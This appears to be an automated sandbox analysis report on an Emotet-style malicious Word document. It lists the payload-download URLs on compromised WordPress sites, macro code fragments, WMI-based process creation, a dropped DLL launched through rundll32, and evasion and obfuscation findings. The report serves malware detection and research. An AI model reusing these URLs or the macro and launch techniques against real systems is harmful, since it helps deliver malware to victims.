Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: WMIC.exe, 00000002.00000003.2138935316.00000000033FB000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: WMIC.exe, 00000002.00000003.2138779240.0000000004D11000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: WMIC.exe, 00000002.00000002.2390402538.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: WMIC.exe, 00000002.00000003.2138779240.0000000004D11000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.php
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpA
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpN
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpR
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://cnkmovil.com/
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://cnkmovil.com/wp-content/plugins/php-compatibility-checker/php52/vendor/egOIa0pQyQl3E.php
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://cnkmovil.com/wp-content/plugins/php-compatibility-checker/php52/vendor/egOIa0pQyQl3E.php)p
Source: WMIC.exe, 00000002.00000002.2390591212.0000000004D19000.00000004.00000001.sdmp String found in binary or memory: https://cnkmovil.com/wp-content/plugins/php-compatibility-checker/php52/vendor/egOIa0pQyQl3E.phphp
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://ecologi.in/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/OAQhv0DsS.php
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://energeticpharma.com/wHkBRXop2.php
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: https://energeticpharma.com/wHkBRXop2.phpl
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/a
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/m
Source: WMIC.exe, 00000002.00000003.2139050094.0000000002525000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.php
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpf
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpk
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://mpcleaning.com.ng/bV7QVXR3xEb9K.php
Source: WMIC.exe, 00000002.00000002.2390402538.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: WMIC.exe, 00000002.00000003.2138939694.0000000003402000.00000004.00000001.sdmp, WMIC.exe, 00000002.00000002.2390608354.0000000004D1F000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/A
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/M
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/rPKiM
Source: WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://wellnessway.co.za/wp-content/plugins/coming-soon-maintenance-mode-from-acurax/css/fonts/x90P
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://www.blackoutthebox.com/wp-content/plugins/woocommerce/src/Admin/B9PqY5aXdcv.php
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.wellnessway.co.za/
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.wellnessway.co.za/tCA
Source: WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp String found in binary or memory: https://www.wellnessway.co.za/wp-content/plugins/coming-soon-maintenance-mode-from-acurax/css/fonts/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443

E-Banking Fraud:

barindex
Drops certificate files (DER)
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Jump to dropped file

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Content" for details. I t3 I a C a
Source: Screenshot number: 8 Screenshot OCR: Enable Content" for details. a S G N)! M O I @ 100% G) A GE)
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" for details.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" for details.
Document contains an embedded VBA macro which may execute processes
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE, VBA macro line: Set jBPHs4UaRM88Lm0l0yxIUb2Zyjho = GetObject(nRUWmhFh_vBMyyo).SpawnInstance_
Document contains an embedded VBA macro with suspicious strings
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE, VBA macro line: Uo0Woz8c0Qoh03pjFxeJH = Environ(AFSyZelG_DtOj1n_IPw2ec.mijI8TkU_dOsoDuF)
Document contains an embedded macro with GUI obfuscation
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Macros/Qww0ixVjApBVEBYdavi9/o' : Found suspicious string activexobject in non macro stream
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_7094072C NtDelayExecution, 6_2_7094072C
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Windows\Temp\5xta3.dll Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70931494 6_2_70931494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_7093A444 6_2_7093A444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70938460 6_2_70938460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70940D9C 6_2_70940D9C
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE, VBA macro line: Private Sub Document_Open()
Document contains embedded VBA macros
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE indicator, VBA macros: true
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal92.expl.evad.winDOC@6/16@9/6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$curiteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCABD.tmp Jump to behavior
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE indicator, Word Document stream: true
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE document summary: title field not present or empty
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE document summary: author field not present or empty
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Virustotal: Detection: 43%
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WMIC.exe Wmic
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: EFRE65.pdb source: WMIC.exe, 00000002.00000003.2138517902.0000000002534000.00000004.00000001.sdmp, 5xta3.dll.2.dr
Source: Binary string: S:\Work\_bin\Release-Win32\ldr.pdb source: rundll32.exe, 00000006.00000002.2386305628.0000000070948000.00000002.00020000.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many randomly named variables
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Macros/VBA/mjNuSqzTfoVromx' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Macros/VBA/Qww0ixVjApBVEBYdavi9' : High number of string operations
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_7093F68C push esi; mov dword ptr [esp], 00000000h 6_2_7093F68D

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Windows\Temp\5xta3.dll Jump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Windows\Temp\5xta3.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Data' entropy: 7.97709464434 (max. 8.0)

Malware Analysis System Evasion:

barindex
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 435 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wbem\WMIC.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2028 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: WMIC.exe, 00000002.00000003.2138874770.00000000033AB000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70936CF0 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 6_2_70936CF0

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE indicator, VBA stomping: true
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: WMIC.exe, 00000002.00000002.2385275903.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385134307.0000000000830000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385278214.0000000000CE0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: WMIC.exe, 00000002.00000002.2385275903.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385134307.0000000000830000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385278214.0000000000CE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WMIC.exe, 00000002.00000002.2385275903.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385134307.0000000000830000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385278214.0000000000CE0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 6_2_70936CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70936CF0 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 6_2_70936CF0
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificates
